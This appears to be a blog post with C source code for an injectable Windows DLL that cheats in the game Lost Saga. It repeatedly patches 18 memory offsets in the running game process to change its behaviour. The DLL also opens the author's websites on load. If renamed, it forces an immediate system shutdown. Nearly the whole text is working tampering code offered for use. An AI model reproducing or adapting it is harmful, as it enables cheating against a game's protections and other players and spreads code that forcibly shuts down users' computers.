#define WIN32_LEAN_AND_MEAN#include <windows.h> #include <stdio.h> #include <stdlib.h> #define OFFSET1 0x1019D61 // ganti dengan offset yang di miliki #define OFFSET2 0x1019EBA // ganti dengan offset yang di miliki #define OFFSET3 0x1026C7C // ganti dengan offset yang di miliki #define OFFSET4 0x104F23D // ganti dengan offset yang di miliki #define OFFSET5 0x104F25D // ganti dengan offset yang di miliki #define OFFSET6 0x104FB59 // ganti dengan offset yang di miliki #define OFFSET7 0x104FB79 // ganti dengan offset yang di miliki #define OFFSET8 0x104FB9D // ganti dengan offset yang di miliki #define OFFSET9 0x104FBB9 // ganti dengan offset yang di miliki #define OFFSET10 0x10570A0 // ganti dengan offset yang di miliki #define OFFSET11 0x105D3F0 // ganti dengan offset yang di miliki #define OFFSET12 0x105D40C // ganti dengan offset yang di miliki #define OFFSET13 0x105D42C // ganti dengan offset yang di miliki #define OFFSET14 0x1064601 // ganti dengan offset yang di miliki #define OFFSET15 0x11D9299 // ganti dengan offset yang di miliki #define OFFSET16 0x11D92BD // ganti dengan offset yang di miliki #define OFFSET17 0x11E0615 // ganti dengan offset yang di miliki #define OFFSET18 0x11E65F4 // ganti dengan offset yang di miliki LPTSTR ModulGame = "lostsaga.exe"; void Patch(void *adr, void *ptr, int size) { DWORD OldProtection; VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection); memcpy(adr,ptr,size); VirtualProtect(adr,size,OldProtection, &OldProtection); } void WritePointer(unsigned long ulBase, int iOffset, int iValue) { if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long))) { if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long))) { *(int*)(*(unsigned long*)ulBase + iOffset) = iValue; } } } DWORD WINAPI MemPacth(LPVOID param) { while (1) { DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA(ModulGame); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)OFFSET1; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET2; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET3; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET4; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET5; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET6; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET7; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET8; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET9; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET10; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET11; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET12; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET13; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET14; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET15; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET1; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET16; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET17; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); adrMin1 = dwPB + (DWORD)OFFSET18; Patch((void *)(adrMin1),(void*)(PBYTE)"\x63", 1); } Sleep(5); } return (0); } BOOL WINAPI DllMain ( HMODULE hDll, DWORD dwReason, LPVOID lpReserved ) { if (dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hDll); if(dwReason == DLL_PROCESS_ATTACH){ MessageBox(0,"By : ultasaputra project","NYIT-NYIT.NET",0); MessageBox(0,"Follow : ultasaputra.blogspot.com","NYIT-NYIT.NET",0); system("start http://ultasaputra.blogspot.com/"); system("start http://www.nyit-nyit.net/user/88254-simple-perfect/"); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MemPacth, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MemPacth, 0, 0, 0); char strDLLName [_MAX_PATH]; GetModuleFileName(hDll, strDLLName , _MAX_PATH); if (strstr(strDLLName, "ultasaputra-7z.dll") <= 0) { system("start C:/Windows/System32/shutdown.exe -s -f -t 00"); ExitProcess(0);//ERROR } } else if(dwReason == DLL_PROCESS_DETACH) { } } return TRUE; }
Komentar
Posting Komentar